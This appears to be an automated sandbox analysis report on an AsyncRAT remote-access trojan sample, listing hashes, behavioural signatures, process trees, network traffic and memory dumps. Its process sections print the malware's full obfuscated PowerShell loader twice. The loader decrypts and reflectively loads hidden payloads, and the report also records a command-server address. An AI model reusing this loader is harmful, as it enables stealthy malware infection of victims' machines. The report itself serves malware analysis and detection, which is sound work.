Malware Analysis Report

2025-01-02 12:14

Sample ID 240417-bg88mahd46
Target 28de2826893ab7e1f2c97521e8fb8ef7.bin
SHA256 5cb19d4ad617cdb09aeacf5e400d617e72245e4596aa7117ff7eecd28a9463be
Tags
asyncrat default rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5cb19d4ad617cdb09aeacf5e400d617e72245e4596aa7117ff7eecd28a9463be

Threat Level: Known bad

The file 28de2826893ab7e1f2c97521e8fb8ef7.bin was found to be: Known bad.

Malicious Activity Summary

asyncrat default rat

AsyncRat

Async RAT payload

Blocklisted process makes network request

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2024-04-17 01:08

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-17 01:08

Reported

2024-04-17 01:10

Platform

win10v2004-20240412-en

Max time kernel

145s

Max time network

153s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\40949bfd50832f026a1f9f6797c0bfa1f8b16698188fc42ca06b04340ba562c1.bat"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\40949bfd50832f026a1f9f6797c0bfa1f8b16698188fc42ca06b04340ba562c1.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\40949bfd50832f026a1f9f6797c0bfa1f8b16698188fc42ca06b04340ba562c1.bat

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\40949bfd50832f026a1f9f6797c0bfa1f8b16698188fc42ca06b04340ba562c1.bat';$ZFXl='SpUNVvliUNVvtUNVv'.Replace('UNVv', ''),'GeIQUWtCIQUWurIQUWrIQUWenIQUWtPrIQUWoceIQUWssIQUW'.Replace('IQUW', ''),'MaaWJUinMaWJUoaWJUdaWJUuaWJUleaWJU'.Replace('aWJU', ''),'CLsXAreaLsXAteDLsXAeLsXAcLsXAryLsXAptLsXAoLsXArLsXA'.Replace('LsXA', ''),'CJHTlhanJHTlgeEJHTlxJHTltJHTlensJHTliJHTlonJHTl'.Replace('JHTl', ''),'EOAqclOAqcemeOAqcntOAqcAtOAqc'.Replace('OAqc', ''),'IYYGanvYYGaokYYGaeYYGa'.Replace('YYGa', ''),'DJEwBeJEwBcJEwBomJEwBprJEwBesJEwBsJEwB'.Replace('JEwB', ''),'LoFiVZaFiVZdFiVZ'.Replace('FiVZ', ''),'EnfjTctfjTcrfjTcyPfjTcofjTcinfjTctfjTc'.Replace('fjTc', ''),'TroNkUanoNkUsfoNkUooNkUrmFoNkUinoNkUalBoNkUlooNkUckoNkU'.Replace('oNkU', ''),'RPrvjePrvjaPrvjdLiPrvjnePrvjsPrvj'.Replace('Prvj', ''),'FPluNrPluNomBPluNasPluNe6PluN4PluNStPluNrPluNinPluNgPluN'.Replace('PluN', ''),'CfvCYopfvCYyfvCYTofvCY'.Replace('fvCY', '');powershell -w hidden;function DnPdg($NpRVN){$PsFdV=[System.Security.Cryptography.Aes]::Create();$PsFdV.Mode=[System.Security.Cryptography.CipherMode]::CBC;$PsFdV.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$PsFdV.Key=[System.Convert]::($ZFXl[12])('XN3NfgiFnJwaec6stVIzE/BuRsj55jkY+1Zsiukr1l4=');$PsFdV.IV=[System.Convert]::($ZFXl[12])('c4L4meGWtdx5xW7a8N8/JA==');$PQhBD=$PsFdV.($ZFXl[3])();$tJweH=$PQhBD.($ZFXl[10])($NpRVN,0,$NpRVN.Length);$PQhBD.Dispose();$PsFdV.Dispose();$tJweH;}function gsaQk($NpRVN){$XgXaM=New-Object System.IO.MemoryStream(,$NpRVN);$xWVjE=New-Object System.IO.MemoryStream;$klffI=New-Object System.IO.Compression.GZipStream($XgXaM,[IO.Compression.CompressionMode]::($ZFXl[7]));$klffI.($ZFXl[13])($xWVjE);$klffI.Dispose();$XgXaM.Dispose();$xWVjE.Dispose();$xWVjE.ToArray();}$FZeYR=[System.IO.File]::($ZFXl[11])([Console]::Title);$mGUkZ=gsaQk (DnPdg ([Convert]::($ZFXl[12])([System.Linq.Enumerable]::($ZFXl[5])($FZeYR, 5).Substring(2))));$froPR=gsaQk (DnPdg ([Convert]::($ZFXl[12])([System.Linq.Enumerable]::($ZFXl[5])($FZeYR, 6).Substring(2))));[System.Reflection.Assembly]::($ZFXl[8])([byte[]]$froPR).($ZFXl[9]).($ZFXl[6])($null,$null);[System.Reflection.Assembly]::($ZFXl[8])([byte[]]$mGUkZ).($ZFXl[9]).($ZFXl[6])($null,$null); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

Network

Country Destination Domain Proto
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
NL 193.222.96.41:4449 tcp
US 8.8.8.8:53 41.96.222.193.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 93.65.42.20.in-addr.arpa udp

Files

memory/3232-0-0x00000203A8C00000-0x00000203A8C22000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ndeqyuyu.a2g.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3232-10-0x00007FF95B980000-0x00007FF95C441000-memory.dmp

memory/3232-11-0x00000203A8C30000-0x00000203A8C40000-memory.dmp

memory/3232-12-0x00000203A8C30000-0x00000203A8C40000-memory.dmp

memory/3232-13-0x00000203A8C30000-0x00000203A8C40000-memory.dmp

memory/3232-14-0x00000203A9330000-0x00000203A9374000-memory.dmp

memory/3232-15-0x00000203A9400000-0x00000203A9476000-memory.dmp

memory/4068-16-0x00007FF95B980000-0x00007FF95C441000-memory.dmp

memory/4068-19-0x000001F1ED510000-0x000001F1ED520000-memory.dmp

memory/4068-23-0x000001F1ED510000-0x000001F1ED520000-memory.dmp

memory/4068-30-0x00007FF95B980000-0x00007FF95C441000-memory.dmp

memory/3232-31-0x00000203A9300000-0x00000203A9308000-memory.dmp

memory/3232-32-0x00000203A9310000-0x00000203A9320000-memory.dmp

memory/3232-33-0x00000203A9380000-0x00000203A9398000-memory.dmp

memory/3232-35-0x00007FF9697E0000-0x00007FF9697F9000-memory.dmp

memory/3232-36-0x00000203A8C30000-0x00000203A8C40000-memory.dmp

memory/3232-38-0x00007FF95B980000-0x00007FF95C441000-memory.dmp

memory/3232-39-0x00000203A8C30000-0x00000203A8C40000-memory.dmp

memory/3232-40-0x00000203A8C30000-0x00000203A8C40000-memory.dmp

memory/3232-42-0x00000203A8C30000-0x00000203A8C40000-memory.dmp

memory/3232-43-0x00000203A8C30000-0x00000203A8C40000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-17 01:08

Reported

2024-04-17 01:10

Platform

win7-20240221-en

Max time kernel

121s

Max time network

125s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\40949bfd50832f026a1f9f6797c0bfa1f8b16698188fc42ca06b04340ba562c1.bat"

Signatures

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\40949bfd50832f026a1f9f6797c0bfa1f8b16698188fc42ca06b04340ba562c1.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\40949bfd50832f026a1f9f6797c0bfa1f8b16698188fc42ca06b04340ba562c1.bat

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\40949bfd50832f026a1f9f6797c0bfa1f8b16698188fc42ca06b04340ba562c1.bat';$ZFXl='SpUNVvliUNVvtUNVv'.Replace('UNVv', ''),'GeIQUWtCIQUWurIQUWrIQUWenIQUWtPrIQUWoceIQUWssIQUW'.Replace('IQUW', ''),'MaaWJUinMaWJUoaWJUdaWJUuaWJUleaWJU'.Replace('aWJU', ''),'CLsXAreaLsXAteDLsXAeLsXAcLsXAryLsXAptLsXAoLsXArLsXA'.Replace('LsXA', ''),'CJHTlhanJHTlgeEJHTlxJHTltJHTlensJHTliJHTlonJHTl'.Replace('JHTl', ''),'EOAqclOAqcemeOAqcntOAqcAtOAqc'.Replace('OAqc', ''),'IYYGanvYYGaokYYGaeYYGa'.Replace('YYGa', ''),'DJEwBeJEwBcJEwBomJEwBprJEwBesJEwBsJEwB'.Replace('JEwB', ''),'LoFiVZaFiVZdFiVZ'.Replace('FiVZ', ''),'EnfjTctfjTcrfjTcyPfjTcofjTcinfjTctfjTc'.Replace('fjTc', ''),'TroNkUanoNkUsfoNkUooNkUrmFoNkUinoNkUalBoNkUlooNkUckoNkU'.Replace('oNkU', ''),'RPrvjePrvjaPrvjdLiPrvjnePrvjsPrvj'.Replace('Prvj', ''),'FPluNrPluNomBPluNasPluNe6PluN4PluNStPluNrPluNinPluNgPluN'.Replace('PluN', ''),'CfvCYopfvCYyfvCYTofvCY'.Replace('fvCY', '');powershell -w hidden;function DnPdg($NpRVN){$PsFdV=[System.Security.Cryptography.Aes]::Create();$PsFdV.Mode=[System.Security.Cryptography.CipherMode]::CBC;$PsFdV.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$PsFdV.Key=[System.Convert]::($ZFXl[12])('XN3NfgiFnJwaec6stVIzE/BuRsj55jkY+1Zsiukr1l4=');$PsFdV.IV=[System.Convert]::($ZFXl[12])('c4L4meGWtdx5xW7a8N8/JA==');$PQhBD=$PsFdV.($ZFXl[3])();$tJweH=$PQhBD.($ZFXl[10])($NpRVN,0,$NpRVN.Length);$PQhBD.Dispose();$PsFdV.Dispose();$tJweH;}function gsaQk($NpRVN){$XgXaM=New-Object System.IO.MemoryStream(,$NpRVN);$xWVjE=New-Object System.IO.MemoryStream;$klffI=New-Object System.IO.Compression.GZipStream($XgXaM,[IO.Compression.CompressionMode]::($ZFXl[7]));$klffI.($ZFXl[13])($xWVjE);$klffI.Dispose();$XgXaM.Dispose();$xWVjE.Dispose();$xWVjE.ToArray();}$FZeYR=[System.IO.File]::($ZFXl[11])([Console]::Title);$mGUkZ=gsaQk (DnPdg ([Convert]::($ZFXl[12])([System.Linq.Enumerable]::($ZFXl[5])($FZeYR, 5).Substring(2))));$froPR=gsaQk (DnPdg ([Convert]::($ZFXl[12])([System.Linq.Enumerable]::($ZFXl[5])($FZeYR, 6).Substring(2))));[System.Reflection.Assembly]::($ZFXl[8])([byte[]]$froPR).($ZFXl[9]).($ZFXl[6])($null,$null);[System.Reflection.Assembly]::($ZFXl[8])([byte[]]$mGUkZ).($ZFXl[9]).($ZFXl[6])($null,$null); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Network

N/A

Files

memory/2556-4-0x000000001B510000-0x000000001B7F2000-memory.dmp

memory/2556-5-0x0000000001F20000-0x0000000001F28000-memory.dmp

memory/2556-6-0x000007FEF5600000-0x000007FEF5F9D000-memory.dmp

memory/2556-7-0x0000000002A10000-0x0000000002A90000-memory.dmp

memory/2556-8-0x000007FEF5600000-0x000007FEF5F9D000-memory.dmp

memory/2556-9-0x0000000002A10000-0x0000000002A90000-memory.dmp

memory/2556-10-0x0000000002A10000-0x0000000002A90000-memory.dmp

memory/2556-11-0x0000000002A10000-0x0000000002A90000-memory.dmp

memory/2556-12-0x000007FEF5600000-0x000007FEF5F9D000-memory.dmp

memory/2556-13-0x0000000002A10000-0x0000000002A90000-memory.dmp

memory/2556-14-0x0000000002A10000-0x0000000002A90000-memory.dmp

memory/2556-15-0x0000000002A10000-0x0000000002A90000-memory.dmp

memory/2556-16-0x0000000002A10000-0x0000000002A90000-memory.dmp